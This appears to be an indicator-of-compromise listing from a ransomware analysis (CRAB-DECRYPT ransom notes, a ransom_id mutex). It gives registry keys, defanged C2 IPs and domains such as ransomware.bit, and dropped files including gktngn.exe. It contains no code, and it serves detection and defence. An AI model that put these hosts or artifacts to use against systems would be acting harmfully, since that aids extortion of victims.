<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{2A541AE1-5BF6-4665-A8A3-CFA9672E4291}

Value: CompatBlockPromptCount

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{2A541AE1-5BF6-4665-A8A3-CFA9672E4291}

Value: Version

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{2A541AE1-5BF6-4665-A8A3-CFA9672E4291}

Value: Flags

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{2A541AE1-5BF6-4665-A8A3-CFA9672E4291}

Value: VerCache

<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE

Value: _CurrentObjectId_

<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\TABLET PC

Value: IsTabletPC

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\IEXPLORE

Value: Count

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\IEXPLORE

Value: Flags

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\IEXPLORE

Value: Blocked

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\IEXPLORE

Value: Type

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\IEXPLORE

Value: Time

<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NETBT\PARAMETERS

Value: DhcpScopeID

<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP

Value: ProxyBypass

<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP

Value: IntranetName

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\COOKIES

Value: CachePrefix

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{DBC80044-A445-435B-BC74-9C25C1C588A9}\IEXPLORE

Value: Count

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{DBC80044-A445-435B-BC74-9C25C1C588A9}\IEXPLORE

Value: Flags

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{DBC80044-A445-435B-BC74-9C25C1C588A9}\IEXPLORE

Value: Blocked

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{DBC80044-A445-435B-BC74-9C25C1C588A9}\IEXPLORE

Value: Type

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{DBC80044-A445-435B-BC74-9C25C1C588A9}\IEXPLORE

Value: Time

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}

Value: NewInstallPromptCount

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}

Value: CompatBlockPromptCount

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}

Value: Version

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}

Value: Flags

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}

Value: VerCache

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\HISTORY

Value: CachePrefix

<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS\INTERFACES\{DA4DADDD-6AF1-499A-91BB-269032006D4F}

Value: SoHRequest

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\URLBLOCKMANAGER

Value: NextCheckForUpdateLowDateTime

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\URLBLOCKMANAGER

Value: NextCheckForUpdateHighDateTime

<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\INDEXTABLE\FILEIDINDEX-{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}

Value: _IndexName_

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN

Value: FullScreen

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN

Value: OperationalData

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN

Value: CompatibilityFlags

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN

Value: ImageStoreRandomFolder

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN

Value: Window_Placement

<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\NETWORKLIST\NLA\CACHE\INTRANET

Value: {9EB90D23-C5F9-4104-85A8-47DD7F6C4070}

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}

Value: CompatBlockPromptCount

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}

Value: NewInstallPromptCount

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\SHELL EXTENSIONS\CACHED

Value: {ED50FC29-B964-48A9-AFB3-15EBB9B97F36} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\SHELL EXTENSIONS\CACHED

Value: {17FE9752-0B5A-4665-84CD-569794602F5C} {7F9185B0-CB92-43C5-80A9-92277A4F7B54} 0xFFFF

<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\LRULIST

Value: CurrentLru

<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS\INTERFACES\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}

Value: DhcpDomain

<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS\INTERFACES\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}

Value: DhcpDefaultGateway

<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS\INTERFACES\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}

Value: DhcpSubnetMaskOpt

<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS\INTERFACES\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}

Value: DhcpNameServer

<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS\INTERFACES\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}

Value: SoHRequest

<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS\INTERFACES\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}

Value: DhcpInterfaceOptions

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\CONTENT

Value: CachePrefix

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\1\DESKTOP

Value: Sort

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\1\DESKTOP

Value: ColInfo

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\1\DESKTOP

Value: ItemPos1024x768x96(1)

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\1\DESKTOP

Value: GroupByDirection

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\1\DESKTOP

Value: LogicalViewMode

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\1\DESKTOP

Value: FFlags

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\1\DESKTOP

Value: GroupView

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\1\DESKTOP

Value: GroupByKey:PID

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\1\DESKTOP

Value: IconSize

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\1\DESKTOP

Value: ItemOrder

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\1\DESKTOP

Value: Mode

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\1\DESKTOP

Value: GroupCollapseState

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\1\DESKTOP

Value: GroupByKey:FMTID

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STUCKRECTS2

Value: Settings

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STREAMS\DESKTOP

Value: TaskbarWinXP

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{DBC80044-A445-435B-BC74-9C25C1C588A9}

Value: CompatBlockPromptCount

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{DBC80044-A445-435B-BC74-9C25C1C588A9}

Value: NewInstallPromptCount

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES

Value: KnownProvidersUpgradeTime

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES

Value: DownloadRetries

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES

Value: DefaultScope

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES

Value: DefaultPackCorrection

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\HISTORY

Value: CachePrefix

<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\1\Indexes
<HKLM>\SOFTWARE\WOW6432NODE\Microsoft
<HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\Setup
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\Settings
<HKU>\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ext
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\0a-64-3c-54-a8-18
<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\IndexTable
<HKU>\.DEFAULT\Software\Microsoft\Feeds
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{B4F3A835-0E21-4959-BA22-42B3008E02FF}
<HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\LowRegistry
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\Certificates
<HKU>\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
<HKU>\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed
<HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\Recovery\AdminActive
<HKLM>\SYSTEM\CurrentControlSet\Services\VSS\Diag\Shadow Copy Optimization Writer
<HKU>\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}
<HKU>\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{00021494-0000-0000-C000-000000000046}\Enum
<HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\UrlBlockManager
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\Certificates
<HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain
<HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\IETld\LowMic
<HKU>\.DEFAULT\Software\Microsoft\SystemCertificates\CA
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}
<HKU>\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
<HKU>\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{00021493-0000-0000-C000-000000000046}\Enum
<HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\SearchScopes
<HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\Main\WindowsSearch
<HKU>\.DEFAULT\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\Certificates
<HKU>\.DEFAULT\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLs
<HKLM>\SOFTWARE\CLASSES
<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\LruList
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\DISCARDABLE\POSTSETUP\Component Categories64
<HKU>\.DEFAULT\Software\Microsoft\F12
<HKU>\.DEFAULT\Software
<HKCU>\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2
<HKU>\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{DBC80044-A445-435B-BC74-9C25C1C588A9}
<HKU>\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Zones
<HKU>\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}\iexplore
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CRLs
<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\LRULIST\0000000000000004
<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\LRULIST\0000000000000001
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\Passport
<HKU>\.DEFAULT\SOFTWARE\APPDATALOW\SOFTWARE\Microsoft
<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\2\INDEXES\FileIdIndex-{3f37ba64-ef5c-11e4-bb8d-806e6f6e6963}
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLs
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\{CFFE6C1B-C698-4A68-B86B-DD768F696445}
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\{CFFE6C1B-C698-4A68-B86B-DD768F696445}\0a-64-3c-54-a8-18
<HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\DISCARDABLE\POSTSETUP\COMPONENT CATEGORIES\{00021494-0000-0000-C000-000000000046}
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\DISCARDABLE\POSTSETUP\COMPONENT CATEGORIES\{00021493-0000-0000-C000-000000000046}
<HKU>\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}
<HKU>\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\Windows
<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\INDEXTABLE\FILEIDINDEX-{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}\10000000067F9
<HKU>\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Passport\LowDAMap
<HKU>\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites
<HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\InternetRegistry
<HKU>\.DEFAULT\SOFTWARE\APPDATALOW\Software
<HKU>\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories64\{00021494-0000-0000-C000-000000000046}\Enum
<HKLM>\Software\Microsoft\Windows\CurrentVersion\Reliability\shutdown
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CTLs
<HKU>\.DEFAULT\Software\Microsoft\SystemCertificates\Root
<HKU>\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\LowRegistry
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLs
<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\INDEXTABLE\FILEIDINDEX-{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}\3000000010875
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{DBC80044-A445-435B-BC74-9C25C1C588A9}
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\DISCARDABLE\POSTSETUP\Component Categories
<HKU>\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore
<HKU>\.DEFAULT\Software\Microsoft\SystemCertificates\My
<HKU>\.DEFAULT\Software\AppDataLow
<HKLM>\SOFTWARE\Microsoft\ESENT\Process\318730135\DEBUG
<HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\IntelliForms
<HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\Main
<HKU>\.DEFAULT\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLs
<HKLM>\System\CurrentControlSet\Control\SecurityProviders\Schannel
<HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\Toolbar
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WBEM\CIMOM
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MenuOrder
<HKU>\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories64\{00021493-0000-0000-C000-000000000046}\Enum
<HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\VersionManager
<HKLM>\Software\Wow6432Node
<HKCU>\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
<HKU>\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad
<HKLM>\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Reliability
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CRLs
<HKCU>\SOFTWARE\Microsoft\CTF\MSUTB\
<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
<HKU>\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
<HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\Zoom
<HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\EUPP\DSP
<HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic
<HKLM>\SYSTEM\CurrentControlSet\Services\VSS\Diag\COM+ REGDB Writer
<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\2\Indexes
<HKLM>\SYSTEM\CurrentControlSet\Services\VSS\Diag\ASR Writer
<HKLM>\Software\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\LogonSoundPlayed
<HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\User Preferences
<HKLM>\Software\Wow6432Node\Microsoft\SystemCertificates\Root
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\Stats
<HKU>\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA
<HKU>\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
<HKU>\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}
<HKU>\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{B4F3A835-0E21-4959-BA22-42B3008E02FF}
<HKLM>\Software\Microsoft\WBEM\CIMOM
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\Certificates
<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\2
<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\1
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\DISCARDABLE\POSTSETUP\COMPONENT CATEGORIES64\{00021494-0000-0000-C000-000000000046}
<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\INDEXTABLE\FileIdIndex-{3f37ba64-ef5c-11e4-bb8d-806e6f6e6963}
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}
<HKU>\.DEFAULT\Software\AppDataLow\Software\Microsoft\RepService
<HKLM>\Software\Wow6432Node\Microsoft\SystemCertificates\AuthRoot
<HKU>\.DEFAULT\SOFTWARE\Microsoft
<HKU>\.DEFAULT\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\Certificates
<HKU>\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}\iexplore
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\Explorer
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\Certificates
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}
<HKU>\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing
<HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\GPU
<HKU>\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache
<HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery
<HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\Discardable
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CurrentVersion
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\Recovery
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CTLs
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLs
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\DISCARDABLE\PostSetup
<HKU>\.DEFAULT\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLs
<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\ObjectTable
<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\1\INDEXES\FileIdIndex-{3f37ba64-ef5c-11e4-bb8d-806e6f6e6963}
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\Certificates
<HKU>\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
<HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\PageSetup
<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WBEM
<HKCU>\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RELIABILITY\UserDefined
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLs
<HKU>\.DEFAULT\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLs
<HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\Suggested Sites
<HKU>\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}\iexplore
<HKU>\.DEFAULT\Software\AppDataLow\Software\Microsoft\Internet Explorer
<HKLM>\SYSTEM\CurrentControlSet\Services\VSS\Diag\Registry Writer
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\Explorer
<HKU>\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{2A541AE1-5BF6-4665-A8A3-CFA9672E4291}
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\DISCARDABLE\POSTSETUP\COMPONENT CATEGORIES64\{00021493-0000-0000-C000-000000000046}
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\EUPP

Mutexes

\BaseNamedObjects\Global\pc_group=WORKGROUP&ransom_id=ab8e4b3e3c28b0e4

IP Addresses

95[.]170[.]220[.]66
185[.]242[.]190[.]97
190[.]35[.]242[.]126
13[.]107[.]21[.]200
138[.]201[.]14[.]197
109[.]166[.]237[.]170
81[.]4[.]163[.]122
95[.]43[.]11[.]180
66[.]171[.]248[.]178
154[.]35[.]132[.]71

Domain Names

1[.]0[.]168[.]192[.]in-addr[.]arpa
ns1[.]wowservers[.]ru
carder[.]bit
www[.]torproject[.]org
ipv4bot[.]whatismyipaddress[.]com
ns2[.]wowservers[.]ru
ransomware[.]bit

Files and or directories created

%LocalAppData%\Temp\pidor.bmp
%AppData%\Microsoft\Document Building Blocks\CRAB-DECRYPT.txt
%AppData%\Microsoft\AddIns\CRAB-DECRYPT.txt
%AppData%\Microsoft\Templates\LiveContent\User\Document Themes\CRAB-DECRYPT.txt
%AppData%\Microsoft\Internet Explorer\UserData\19CDHY5T\CRAB-DECRYPT.txt
%UserProfile%\Cookies\CRAB-DECRYPT.txt
%SystemDrive%\Recovery\926583e2-ef64-11e4-beed-d6738078ad98\CRAB-DECRYPT.txt
%AppData%\Microsoft\Templates\LiveContent\User\SmartArt Graphics\1033\CRAB-DECRYPT.txt
%LocalAppData%\Microsoft\Internet Explorer\imagestore\aa4x2ky\imagestore.dat
%AppData%\Microsoft\gktngn.exe
%AppData%\Microsoft\Internet Explorer\UserData\N03JH1M1\CRAB-DECRYPT.txt
%AppData%\Media Center Programs\CRAB-DECRYPT.txt
%AppData%\Microsoft\Office\Recent\CRAB-DECRYPT.txt
%LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\sidenav-arrow[1].gif
%AppData%\Microsoft\Templates\LiveContent\User\Document Themes\1033\CRAB-DECRYPT.txt
%UserProfile%\Favorites\CRAB-DECRYPT.txt
%AppData%\Microsoft\Crypto\RSA\S-1-5-21-2580483871-590521980-3826313501-500\CRAB-DECRYPT.txt
